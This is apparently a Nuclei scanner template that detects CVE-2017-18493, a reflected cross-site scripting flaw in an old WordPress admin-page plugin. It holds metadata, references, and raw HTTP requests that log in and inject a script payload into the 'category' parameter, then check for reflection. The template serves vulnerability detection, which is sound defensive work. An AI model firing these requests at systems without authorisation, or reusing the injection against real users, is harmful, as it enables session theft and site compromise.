id: CVE-2017-18493 info: name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues. reference: - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - https://nvd.nist.gov/vuln/detail/CVE-2017-18493 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493 - https://wordpress.org/plugins/custom-admin-page/#developers classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: bestwebsoft product: custom_admin_page framework: wordpress publicwww-query: "/wp-content/plugins/custom-admin-page/" tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and # digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950